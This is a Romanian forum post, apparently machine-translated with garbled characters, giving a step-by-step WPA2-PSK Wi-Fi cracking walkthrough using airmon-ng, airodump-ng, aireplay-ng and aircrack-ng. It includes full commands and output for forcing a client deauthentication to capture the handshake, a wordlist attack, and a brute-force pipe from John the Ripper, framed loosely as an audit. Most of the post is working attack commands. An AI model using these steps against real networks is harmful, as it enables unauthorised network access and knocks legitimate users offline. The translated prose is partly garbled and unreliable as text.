Jump to content
everton

intrebare

Recommended Posts

În primul rând, pune carte în modul de a monitoriza:

root@bt:~# airmon-ng

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

root@bt:~# airmon-ng start wlan0

Interface Chipset Driver

wifi0 Atheros madwifi-ng

ath0 Atheros madwifi-ng VAP (parent: wifi0)

ath1 Atheros madwifi-ng VAP (parent: wifi0)

wlan0 Ralink 2573 USB rt73usb - [phy0]

(monitor mode enabled on mon0)

-----------------------------------------------------------------

Ok, putem folosi acum interfa?? mon0

S? g?seasc? o re?ea f?r? fir care utilizeaz? WPA2 / PSK

root@bt:~# airodump-ng mon0

CH 6 ][ Elapsed: 4 s ][ 2009-02-21 12:57

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 5 0 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -29 0- 1 12 4 TestNet

--------------------------------------------------------------------------------

Stop airodump-ng ?i rulazel din nou, scris toate pachetele de pe disc:

airodump-ng mon0 --channel 10 --bssid 00:19:5B:52:AD:F7 -w /tmp/wpa2

------------------------------------------------------------------------

În acest moment, ave?i 2 op?iuni: fie a?tepta?i pân? când un client se conecteaz? ?i 4-way handshake este complet, sau deauthenticate un client existent ?i, astfel, for?a s? reassociate. deci s? vigoare deauthenticate. Avem nevoie de bssid de AP (-a) ?i MAC a unui client conectat (-c)

---------------------------------------------------------------------------------

root@bt:~# aireplay-ng -0 1 -a 00:19:5B:52:AD:F7 -c 00:1C:BF:90:5B:A3 mon0

13:04:19 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10

13:04:20 Sending 64 directed DeAuth. STMAC: [00:1C:BF:90:5B:A3] [67|66 ACKs]

----------------------------------------------------------------------------------

Ca rezultat, airodump-ng ar trebui s? indice "WPA Handshake:" în col?ul din dreapta sus

CH 10 ][ Elapsed: 2 mins ][ 2009-02-21 13:04 ][ WPA handshake: 00:19:5B:52:AD:F7

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:19:5B:52:AD:F7 -33 100 1338 99 0 10 54 WPA2 CCMP PSK TestNet

BSSID STATION PWR Rate Lost Packets Probe

00:19:5B:52:AD:F7 00:1C:BF:90:5B:A3 -27 54-54 0 230

-----------------------------------------------------------------------

Stop airodump-ng ?i asigura?i-v? c? dosarele au fost create în mod corespunz?tor

root@bt:/# ls /tmp/wpa2* -al

-rw-r--r-- 1 root root 35189 2009-02-21 13:04 /tmp/wpa2-01.cap

-rw-r--r-- 1 root root 476 2009-02-21 13:04 /tmp/wpa2-01.csv

-rw-r--r-- 1 root root 590 2009-02-21 13:04 /tmp/wpa2-01.kismet.csv

----------------------------------------------------------------------------

Deci, dac? wordlist este denumit word.lst (în conformitate cu / tmp / wordlists), ai posibilitatea s? executi

aircrack-ng –w /tmp/wordlists/word.lst -b 00:19:5B:52:AD:F7 /tmp/wpa2*.cap

---------------------------------------------------------------------------------

Succesul cracare cheie WPA2 PSK este direct legat? de for?a de fi?ier parola. Cu alte cuvinte, poate ai noroc si sa-cheie foarte rapid, sau posibil s? nu ob?ine?i cheia la toate.

A doua metoda (bruteforcing) va fi de succes pentru sigur, dar poate dura vârstele pentru a finaliza. P?stra?i în minte, o cheie WPA2 poate fi de pân? la 64 de caractere, astfel încât, în teorie, ar tine de a construi în fiecare combina?ie parol? cu toate seturile de caractere posibile în Aircrack. Dac? utiliza?i John the Ripper pentru a crea toate combina?iile posibile parola în Aircrack-ng, aceasta este comanda de a folosi:

root@bt:~# /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b 00:19:5B:52:AD:F7

---------------------------------------------------------------------------------------

8 caractere, caractere simplu (litere mici ?i majuscule) sau cifre = fiecare personaj în cheie ar putea dispune de 26 26 10 (62) de combina?ii posibile. Deci, num?rul maxim de combina?ii care trebuie s? fie verificate în procesul de Bruteforce este de 62 * 62 * 62 * 62 * 62 * 62 * 62 * 62 = 218 340 105 584 896 La aproximativ 600 de chei pe secund? pe lent meu "" de sistem, ar putea dura mai mult decât 101083382 or? pentru a g?si cheie (11539 ani). Eu am oprit procesul de cracare ca masina mea este prea mod lent la spre crack-cheie în timp ce eu sunt înc? în via?? ... Deci, cred c? despre asta atunci cand faceti o WPA2 PSK de audit.

asta ii teorie dar la wpa ii greu sa gasesti la wpa2 tot asa sansa ii mica de tot

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...